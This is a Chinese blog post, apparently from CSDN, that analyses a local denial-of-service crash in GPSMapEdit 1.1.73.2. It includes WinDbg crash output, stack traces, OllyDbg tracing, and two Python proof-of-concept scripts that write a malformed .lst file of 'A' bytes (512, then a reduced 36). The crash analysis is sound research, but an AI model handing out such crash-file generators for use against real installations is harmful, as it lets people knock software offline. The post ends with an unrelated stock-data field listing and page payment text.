GPSMapEdit 1.1.73.2 - '.lst' 本地拒绝服务

GPSMapEdit 1.1.73.2 - ‘.lst’ 本地拒绝服务

调试环境:

系统:winxp sp3
工具:windbg,ollydbg
软件地址:https://www.exploit-db.com/apps/9df815fc25a88ead2fe069e32883265e-mapedit1-1-73-2-setup.exe

这个漏洞没有找到相关的调试的文章,这篇博客会根据漏洞库中提供的POC,来找一下漏洞形成的原因,利用的话还没想出来。

漏洞库提供的POC如下所示:

file="GPSMapEdit_crash.lst"
junk="\x41"*512

print "[*] Creating crash file...\n"
writeFile = open (file, "w")
writeFile.write(junk)
writeFile.close()
print "[*] File successfully created!\n\n"

很简单,就是用521个字符’A’构造一个.lst文件。

首先,用Ollydbg打开GPSMapEdit程序,输入命令g运行程序,然后让GPSMapEdit程序打开POC文件构造的GPSMapEdit_crash.lst文件,程序崩溃,windbg定位到崩溃现场。

崩溃现场的信息如下所示:

(418.638): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=43634141 ebx=00e2ec58 ecx=025afd60 edx=00000001 esi=bebec0bf edi=00000000
eip=00508e4a esp=025afd4c ebp=025afdb4 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
*** WARNING: Unable to verify checksum for mapedit.exe
*** ERROR: Module load completed but symbols could not be loaded for mapedit.exe
mapedit+0x108e4a:
00508e4a 8b4818          mov     ecx,dword ptr [eax+18h] ds:0023:43634159=????????

通过最后一行可以看出,程序崩溃的原因是找不到地址[eax+18h],如果崩溃点是因为这个的话,那么问题就出在eax寄存器的值里面了,看一下上面的信息里面,eax=43634141。

然后输入命令kb,看一下栈回溯

ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
025afdb4 005278c1 02220000 00000200 00000000 mapedit+0x108e4a
025afdd0 00529d34 02220000 00000200 00e39354 mapedit+0x1278c1
025afe2c 0052a63c 00e392dc 01000000 00000000 mapedit+0x129d34
025aff98 0052a4bb 00e0e188 00000000 025affdc mapedit+0x12a63c
025affb4 7c80b713 00e2ec58 00000000 00000000 mapedit+0x12a4bb
025affec 00000000 0052a49c 00e2ec58 00000000 kernel32!GetModuleFileNameA+0x1b4

稍微解释一下:命令kb,可以查看函数的调用关系。上面的数据,每一行代表一个栈帧,也就是一个函数,下面一行是上面一行的父函数。每一行的第一列数据是栈帧的基址,也就是EBP的值;第二列是函数的返回地址,函数调用的下一行;后面三列是函数的三个参数。

从上面的回溯信息没有看出来有太大的问题,那就从最上层函数开始找找看。最后一行是kernel32.dll文件里的原型函数,倒数第二行的返回地址直接返回到动态链接库里面了,不找。那就从倒数第三行开始找。

用ollydbg打开GPSMapEdit程序,然后在7c80b713的上一个地址,

0052a4b6 | call 0052A4EF

在这个地方设置断点,然后F9运行到该地址,进去看看。

单步运行,一路看着寄存器以及堆栈窗口的内容变化,一直到

0052A637 | call 00529C58

这个地方,都没有什么奇怪的内容出现,进去这个函数。因为这个函数是上面堆栈上的倒数第四个函数,返回地址为0052a63c的那一个。

进去以后,继续单步运行,然后就可以看到调试窗口已经冒出来一些熟悉的数字,比方说size=200h这种,还有一串’A’等,现在是在传递他们的地址。说明已经离崩溃点不远了,继续运行,

00529D2F | call 0052782F

也就是第二个函数。这个地址之前的几个地址已经明显看出来,程序把相关的参数都压栈了,在堆栈窗口已经可以看到相关的参数以及其地址,比如那串’A’的地址为02220000(这是我这里显示的,可能会有不同)。

继续单步执行,就会看到.lst也入栈了,应该是确定文件类型的。碰到最后一个函数调用,继续进入,

然后就会看到下图中的代码

在这里插入图片描述

第一句:MOV ECX,DWORD PTR SS:[EBP+8],这时EBP的值为025AFDB4,去栈区看EBP+8的值为02220000,就是字符串’A’的地址,这一步就是把02220000赋值给ECX。

第二句:MOV EAX,DWORD PTR DS:[ECX+32],把ECX+32位置的值赋给EAX,这一步过后,EAX的值变成了41414141,好的,问题来了,估计就是这儿出问题了。

第三句:ADD EAX,ECX,把EAX和ECX的值相加,并且赋值给EAX。这一步之前,EAX=41414141,ECX=0222000,相加后为43634141,这个数字非常熟悉,就是刚开始崩溃点的EAX的值,也就是说从这里到程序崩溃,EAX的值没有在变过。

继续运行:程序崩溃,崩溃原因找不到[eax+18h]的值。

上面三步,是程序崩溃的来源,从第二句可以看出来,ECX+32的值就是EAX的值。

验证一下:
把POC文件中的字符’A’的长度,从512改为分别改为32和36,再次生成有问题的畸形文件,结果是36的文件引发错误,通过512是一样,32的那个虽然报错了,但是报的是内容错误,程序并没有崩溃。现在可以确定,该程序的拒绝服务就是由于第二步中,覆盖掉了EAX正确的值引起的。

精简一下POC:

file="GPSMapEdit_crash_36.lst"
junk="\x41"*36

print "[*] Creating crash file...\n"
writeFile = open (file, "w")
writeFile.write(junk)
writeFile.close()
print "[*] File successfully created!\n\n"

以上就是我找原因的过程。

Stkcd [股票代码] ShortName [股票简称] Accper [统计截止日期] Typrep [报表类型编码] Indcd [行业代码] Indnme [行业名称] Source [公告来源] F060101B [净利润现金净含量] F060101C [净利润现金净含量TTM] F060201B [营业收入现金含量] F060201C [营业收入现金含量TTM] F060301B [营业收入现金净含量] F060301C [营业收入现金净含量TTM] F060401B [营业利润现金净含量] F060401C [营业利润现金净含量TTM] F060901B [筹资活动债权人现金净流量] F060901C [筹资活动债权人现金净流量TTM] F061001B [筹资活动股东现金净流量] F061001C [筹资活动股东现金净流量TTM] F061201B [折旧摊销] F061201C [折旧摊销TTM] F061301B [公司现金流1] F061302B [公司现金流2] F061301C [公司现金流TTM1] F061302C [公司现金流TTM2] F061401B [股权现金流1] F061402B [股权现金流2] F061401C [股权现金流TTM1] F061402C [股权现金流TTM2] F061501B [公司自由现金流(原有)] F061601B [股权自由现金流(原有)] F061701B [全部现金回收率] F061801B [营运指数] F061901B [资本支出与折旧摊销比] F062001B [现金适合比率] F062101B [现金再投资比率] F062201B [现金满足投资比率] F062301B [股权自由现金流] F062401B [企业自由现金流] Indcd1 [行业代码1] Indnme1 [行业名称1] 季度数据,所有沪深北上市公司的 分别包含excel、dta数据文件格式及其说明,便于不同软件工具对数据的分析应用 数据来源:基于上市公司年报及公告数据整理,或相关证券交易所、各部委、省、市数据 数据范围:基于沪深北证上市公司 A股(主板、中小企业板、创业板、科创板等)数据整理计算
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值